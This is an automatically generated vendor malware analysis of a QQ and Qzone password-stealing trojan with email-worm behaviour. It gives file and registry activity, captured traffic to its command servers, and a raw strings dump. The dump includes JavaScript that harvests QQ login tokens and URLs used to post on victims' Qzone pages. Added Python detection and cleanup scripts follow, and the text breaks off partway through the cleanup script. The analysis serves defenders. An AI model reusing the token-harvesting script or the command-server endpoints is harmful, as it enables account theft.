Gen.Variant.Graftor.112914_e48aab3ebe

by malwarelabrobot on December 9th, 2016 in Malware Descriptions.

Trojan.Win32.Gofot.frc (Kaspersky), Gen:Variant.Graftor.112914 (B) (Emsisoft), Gen:Variant.Graftor.112914 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: e48aab3ebe9c90ab28ddf9ae34572704
SHA1: 80a93f3fdcc982c28c0fb67268ed6372a793bd5a
SHA256: f6cf59e76a45535b9839fa5b2444915179fae7174e97411264f2af202e9998d8
SSDeep: 24576:djco9HBcyy9wYbqdu Uy3kmaJBgFB2b5HDubJQ5eseDX2nXUXNNVi:eIymLUy3kmambOeDCMN7i
Size: 1552384 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-12-01 09:40:58
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW: a Trojan program intended for stealing users' passwords.

Payload     Behaviour Description
EmailWorm   Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

%original file name%.exe:3380

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\winhelp.ini (381 bytes)
C:\Windows\0cm7.dll (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\udp[1].htm (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\fs[1].htm (52 bytes)
C:\Windows\System32\ML4v.txt (31 bytes)
C:\Windows\System32\JiTG.txt (52 bytes)
C:\Windows\1kmu.exe (50 bytes)
C:\Windows\System32\6298.txt (31 bytes)

The Trojan deletes the following file(s):

C:\Windows\winhelp.ini (0 bytes)
C:\Windows\System32\JiTG.txt (0 bytes)
C:\Windows\System32\ML4v.txt (0 bytes)
C:\Windows\System32\6298.txt (0 bytes)

Registry activity

The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
a82965d35bcabacf7a2cae338b2c62a6 c:\Windows\0cm7.dll
7a7ac06a379148ff23ca3e9c3b90b07b c:\Windows\1kmu.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 55490 57344 4.45163 0e44623b93ac4c84c970bed81ecdba2e
.rdata 61440 14966 16384 3.20399 cb8c4aafd8e935c7c54fe5ada7e940ea
.data 77824 1482208 1474560 4.34935 40d7545c8f51594c27bdbdf1f7851de0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ipaddress.wb916.com/udp.htm 120.55.106.30
hxxp://ipaddress.wb916.com/fs.aspx 120.55.106.30
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /udp.htm HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ipaddress.wb916.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 31
Content-Type: text/html
Last-Modified: Fri, 25 Nov 2016 18:01:38 GMT
Accept-Ranges: bytes
ETag: "d639eaf74547d21:1324"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 08 Dec 2016 17:01:46 GMT
[120.55.106.30|120.55.106.30]......



GET /fs.aspx HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ipaddress.wb916.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 08 Dec 2016 17:01:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30128
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52
......IP...:..[194.242.96.218]........:(.........)....


The Trojan connects to the servers at the following location(s):

%original file name%.exe_3380:


1kmu.exe_3700:

.text
`.rdata
@.data
diu2.iuG?iup
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
user32.dll
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
USER32.dll
comdlg32.dll
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
WINSPOOL.DRV
COMCTL32.dll
SHLWAPI.dll
GetCPInfo
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
qq.exe
.rsrc
t%SVh
t$(SSh
~%UVW
u.hxHN
u$SShe
kernel32.dll
ole32.dll
shlwapi.dll
Kernel32.dll
IPHLPAPI.DLL
ws2_32.dll
oleaut32.dll
OleAut32.dll
atl.dll
Winhttp.dll
wininet.dll
WinHttpCheckPlatform
WinHttpCrackUrl
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpSetTimeouts
WinHttpSetCredentials
WinHttpCloseHandle
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpQueryHeaders
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
WebBrowser
socket_udp
120.55.106.30
120.55.148.93
.txt?
hXXp://list.uc916.com:7000/server/qzone/
\sdfDll.ini
\config.ini
154396063
(*^__^*)
hXXp://api.t.sina.com.cn/short_url/shorten.json?source=3213676317&url_long=
[0].url_short
hXXp://
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
ipaddress.wb916.com
/fs.aspx
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
hXXp://ipaddress.wb916.com/udp.htm
120.55.106.30|120.55.148.93
|qqkey|
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
\npSSOAxCtrlForPTLogin.dll
\SSOCommon.dll
\SSOLUIControl.dll
\SSOPlatform.dll
%System%\regsvr32.exe /s /u "
%System%\regsvr32.exe /s "
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
ptui_qlogin_CB('0', '
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=
msglist
].content
msglist[
].rt_uin
].pic
].height
].pic[
].width
].tid
p_skey=(.*?);
http=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Adodb.Stream
WinHttp
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_delete_v6?g_tk=
/311&hostuin=
qzreferrer=http://user.qzone.qq.com/
hXXp://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi?g_tk=
/profile/permit&flag=0x0&fupdate=1&uin=
/profile/permit&flag=0x20101&fupdate=1&uin=
/profile/permit&flag=0x40000&fupdate=1&uin=
/profile/permit
frameElement.callback(
hXXp://w.qzone.qq.com/cgi-bin/right/set_revertright.cgi?g_tk=
/profile/permit&fupdate=1&uin=
hXXp://user.qzone.qq.com/p/r/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=
data.items
].uin
data.items[
].name
hXXp://union.uc916.com/zone/get
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_forward_v6?g_tk=
hXXp://union.uc916.com/zone/set
,nick:
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=
skey=
Content-Disposition: form-data; name="skey"
skey
1.jpg
Content-Disposition: form-data; name="filename"; filename="1.jpg"
hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image
&special_url=&subrichtype=1&pic_bo=
/311&syn_tweet_verson=1¶mstr=1&pic_template=&richtype=1&richval=
/311&syn_tweet_verson=1¶mstr=1&pic_template=tpl-
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
HTTP/1.1
hXXps://
hXXp://b1.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=
&iNotice=1&inCharset=utf-8&outCharset=utf-8&format=fs&ref=qzone&json=1&g_tk=800267314&secverifykey=28Q1206
qzreferrer=http://ctc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=个人日记&title=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_save?g_tk=
&share2weibo=0&onekey=0&comment=0&entryuin=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/qzshare/popup.html¬ice=1&fupdate=1&platform=qzone&token=1594827009&auto=0&type=blog&description=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?fupdate=2&g_tk=
&spaceuin=0&isfriend=1&uin=
qzreferrer=http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzsharegetmylistbytype?uin=
hXXp://b11.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=
&secverifykey=28Q1206
&dprefix=&inCharset=gb2312&outCharset=gb2312&ref=qzone&page=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&uin=
&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=
&blogid=
qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
1970-01-01 08:00:00
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=
&type=4&url=
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Referer: hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.ecyc.net?v0TPk3ocH5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.7.1000 Chrome/30.0.1599.101 Safari/537.36
Origin: hXXp://sns.qzone.qq.com
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_timershuoshuo_v6?g_tk=
&clientkey=
&keyindex=9&pt_aid=715030901&daid=371&u1=http://buluo.qq.com/p/barindex.html?bid=
ptui_qlogin_CB(
&source=2&extparam={"client_type":4}&bkn=
Host: buluo.qq.com
Origin: hXXp://buluo.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: hXXp://buluo.qq.com/p/barindex.html?bid=230661
hXXp://buluo.qq.com/cgi-bin/bar/site/post/pub_rich_post
hXXp://captcha.qq.com/getimage?aid=716013036&v=0.
c:/teset.jpg
17004455
hXXp://buluo.qq.com/cgi-bin/bar/post/captcha/verify_v2
hXXp://union.uc916.com/zone/list
hXXp://buluo.qq.com/p/detail.html?bid=
&like=1&source=2&extparam={"client_type":4}&r=0.
hXXp://buluo.qq.com/cgi-bin/bar/post/like
","pic_list":[{"url":"
&coordinate=1&source=2&extparam={"client_type":4}&pid=
hXXp://buluo.qq.com/cgi-bin/bar/post/comment_v2
------WebKitFormBoundarya59o1fM4ajrut49e
Content-Disposition: form-data; name="file"; filename="1.jpg"
------WebKitFormBoundarya59o1fM4ajrut49e--
Host: upload.buluo.qq.com
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarya59o1fM4ajrut49e
Referer: hXXp://buluo.qq.com/buluoadmin/for-crossdomain.html
hXXp://upload.buluo.qq.com/cgi-bin/bar/upload/image?callback=singleImgUpload
url":"
hXXp://union.uc916.com/zone/del?userId=
c:\windows\iextadd.dat
\delext .bat
var t=$.activetxsso,e=t.CreateTXSSOData();
t.InitSSOFPTCtrl(0,e);
var i=t.DoOperation(1,e);
for(var o=i.GetArray("PTALIST"),p=o.GetSize(),r=0;
var a=o.GetData(r),c=a.GetDWord("dwSSO_Account_dwAccountUin"),u=a.GetDWord("dwSSO_Account_dwAccountUin"),g="",d=a.GetByte("cSSO_Account_cAccountType"),h=c;
g=a.GetArray("SSO_Account_AccountValueList"),h=g.GetStr(0)
m=a.GetWord("wSSO_Account_wFaceIndex")
_=a.GetStr("strSSO_Account_strNickName")
for(var v=a.GetBuf("bufST_PTLOGIN"),w="",y=v.GetSize(),b=0;
var k=v.GetAt(b).toString("16");
1==k.length&&(k="0" k),w =k
document.body.innerHTML=qq754497519();
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=hXXps://mail.qq.com
hXXp://api.ruokuai.com/register.xml
hXXp://api.ruokuai.com/info.xml
hXXp://api.ruokuai.com/recharge.xml
hXXp://api.ruokuai.com/create.xml
hXXp://api.ruokuai.com/reporterror.xml
VBScript.RegExp
MSScriptControl.ScriptControl
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
this.getUTCFullYear()   '-'  
f(this.getUTCMonth()   1)   '-'  
f(this.getUTCDate())   'T'  
f(this.getUTCHours())   ':'  
f(this.getUTCMinutes())   ':'  
f(this.getUTCSeconds())   'Z' : null;
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
'"' : '\\"',
'\\': '\\\\'
escapable.lastIndex = 0;
return escapable.test(string) ? '"'   string.replace(escapable, function (a) {
'\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
// Produce a string from holder[key].
k, // The member key.
value = holder[key];
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
// Join all of the elements together, separated with commas, and wrap them in
v = partial.length === 0 ? '[]' : gap ?
'[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']' :
'['   partial.join(',')   ']';
length = rep.length;
partial.push(quote(k)   (gap ? ': ' : ':')   v);
// Otherwise, iterate through all of the keys in the object.
if (Object.prototype.hasOwnProperty.call(value, k)) {
// Join all of the member texts together, separated with commas,
v = partial.length === 0 ? '{}' : gap ?
'{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}' :
'{'   partial.join(',')   '}';
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
// that can replace values, or an array of strings that will select the keys.
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
// Make a fake root object containing our value under the key of ''.
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
// Parsing happens in four stages. In the first stage, we replace certain
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
('0000'   a.charCodeAt(0).toString(16)).slice(-4);
// We split the second stage into 4 regexp operations in order to work around
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// In the optional fourth stage, we recursively walk the new structure, passing
throw new SyntaxError('JSON.parse');
// These forms are obsolete. It is recommended that JSON.stringify and
// JSON.parse be used instead.
if (!Object.prototype.toJSONString) {
Object.prototype.toJSONString = function (filter) {
return JSON.stringify(this, filter);
Object.prototype.parseJSON = function (filter) {
return JSON.parse(this, filter);
JSON.stringify(
.push(
.map)'){
.splice(
) {ary=ary + key + ','; }
var ary=''; for (var key in
&password=
application/x-www-form-urlencoded
&softkey=
Content-Disposition: form-data; name="password"
{pass}
Content-Disposition: form-data; name="softkey"
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
SetClientCertificate
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
?456789:;<=
!"#$%&'()*+,-./0123
F%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
Broken pipe
Inappropriate I/O control operation
Operation not permitted
RASAPI32.dll
WinExec
GetWindowsDirectoryA
GetViewportOrgEx
WINMM.dll
ShellExecuteA
OLEAUT32.dll
oledlg.dll
WS2_32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
CreateDialogIndirectParamA
GetViewportExtEx
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
:%d) |
%I64d%s
:0{}%s
:%d)%s
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
#include "l.chs\afxres.rc" // Standard components
z>kernel32.dll
Comdlg32.dll
program internal error number is %d.
:"%s"
:"%s".
;3 #>6.&
'2, / 0&7!4-)1#
c:\windows\1kmu.exe
(*.*)
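The form field names (`password`, `softkey`), the multipart part with filename `System.Byte[]`, the `application/x-www-form-urlencoded` content type, the `HTTP/1.0` version string and the hard-coded `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)` User-Agent in the strings above together describe the sample's credential upload. The following is an added detection example, not code from the page or from the sample: it parses a raw HTTP POST and reports which of those indicators it carries, requiring both exfiltration field names before calling it a match, since `password` on its own is any login form. The destination host, URL paths and request bodies in the constructed samples are placeholders and are not values taken from the page.

```python
import re
from urllib.parse import parse_qs

# Indicator strings copied from the "Strings from Dumps" list above.
INDICATOR_UA = b"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
INDICATOR_VERSION = b"HTTP/1.0"
EXFIL_FIELDS = {"password", "softkey"}
EXFIL_FILENAME = "System.Byte[]"

_DISPOSITION = re.compile(
    rb'Content-Disposition:\s*form-data;\s*name="([^"]*)"(?:;\s*filename="([^"]*)")?',
    re.IGNORECASE,
)


def split_request(raw: bytes):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def body_fields(headers, body):
    """Return (field names, upload filenames) for urlencoded or multipart bodies."""
    ctype = headers.get(b"content-type", b"")
    if ctype.startswith(b"application/x-www-form-urlencoded"):
        return set(parse_qs(body.decode("latin-1"), keep_blank_values=True)), set()
    if ctype.startswith(b"multipart/form-data"):
        names, files = set(), set()
        for m in _DISPOSITION.finditer(body):
            names.add(m.group(1).decode("latin-1"))
            if m.group(2) is not None:
                files.add(m.group(2).decode("latin-1"))
        return names, files
    return set(), set()


def classify(raw: bytes):
    """Return (is_exfil, reasons).

    The verdict needs both 'password' and 'softkey' in the body; the
    User-Agent, HTTP/1.0 and 'System.Byte[]' indicators only corroborate.
    """
    request_line, headers, body = split_request(raw)
    if not request_line.startswith(b"POST "):
        return False, []
    names, files = body_fields(headers, body)
    reasons = []
    if EXFIL_FIELDS <= names:
        reasons.append("body carries both 'password' and 'softkey' fields")
    if EXFIL_FILENAME in files:
        reasons.append("upload part with filename 'System.Byte[]'")
    if headers.get(b"user-agent") == INDICATOR_UA:
        reasons.append("hard-coded MSIE 6.0 / Windows NT 5.0 User-Agent")
    if request_line.endswith(INDICATOR_VERSION):
        reasons.append("HTTP/1.0 request line")
    return EXFIL_FIELDS <= names, reasons


# Constructed sample traffic (host, paths and values are placeholders, not from the page).
SAMPLE_MULTIPART = (
    b"POST /upload HTTP/1.0\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
    b"Content-Type: multipart/form-data; boundary=XX\r\n"
    b"\r\n"
    b"--XX\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\nhunter2\r\n"
    b"--XX\r\nContent-Disposition: form-data; name=\"softkey\"\r\n\r\nk-0000\r\n"
    b"--XX\r\nContent-Disposition: form-data; name=\"image\"; filename=\"System.Byte[]\"\r\n"
    b"Content-Type: application/octet-stream\r\n\r\n\x89PNG\r\n--XX--\r\n"
)
SAMPLE_URLENCODED = (
    b"POST /post HTTP/1.0\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"user=alice&password=hunter2&softkey=k-0000"
)
SAMPLE_BENIGN = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"username=alice&password=hunter2"
)

if __name__ == "__main__":
    for name, raw in (("multipart", SAMPLE_MULTIPART), ("urlencoded", SAMPLE_URLENCODED), ("benign", SAMPLE_BENIGN)):
        verdict, reasons = classify(raw)
        print(name, "EXFIL" if verdict else "clean", reasons)
```

The same field test can be lifted into an IDS rule on the `softkey` disposition or parameter name; the User-Agent alone is too common in old tooling to alert on by itself.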


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3380

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\winhelp.ini (381 bytes)
    C:\Windows\0cm7.dll (50 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\udp[1].htm (31 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\fs[1].htm (52 bytes)
    C:\Windows\System32\ML4v.txt (31 bytes)
    C:\Windows\System32\JiTG.txt (52 bytes)
    C:\Windows\1kmu.exe (50 bytes)
    C:\Windows\System32\6298.txt (31 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
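A scripted form of steps 2 and 3 above, added here as an example rather than a tool from the page: it expands the `%CurrentUserName%` placeholder, re-roots the `C:\` paths under a chosen directory so it can also be run against a mounted image, reports which listed artifacts exist, and groups them by SHA-256. The list shows `0cm7.dll` and `1kmu.exe` at the same 50 bytes and the two cache `.htm` entries at the same sizes as the three `System32\*.txt` files, so hashing tells whether they are copies of one another before anything is deleted. The fixture tree and its contents are constructed for the test; the dropped files' real contents are not on this page, and step 1 (the `%original file name%.exe` process) is left to the operator.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

# Artifact list from the removal steps above; the page's quotes around the
# %CurrentUserName% placeholder are dropped so the placeholder can be expanded.
TIF = r"C:\Users\%CurrentUserName%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5"
ARTIFACTS = [
    r"C:\Windows\winhelp.ini",
    r"C:\Windows\0cm7.dll",
    TIF + r"\25FDO7QC\udp[1].htm",
    TIF + r"\JYNOWECL\fs[1].htm",
    r"C:\Windows\System32\ML4v.txt",
    r"C:\Windows\System32\JiTG.txt",
    r"C:\Windows\1kmu.exe",
    r"C:\Windows\System32\6298.txt",
]


def expand(artifact: str, user: str, root: str) -> str:
    """Fill %CurrentUserName% and re-root the C:\\ path under `root`.

    On the infected host pass root="C:\\"; re-rooting lets the same code run
    against a mounted image or the constructed fixture below.
    """
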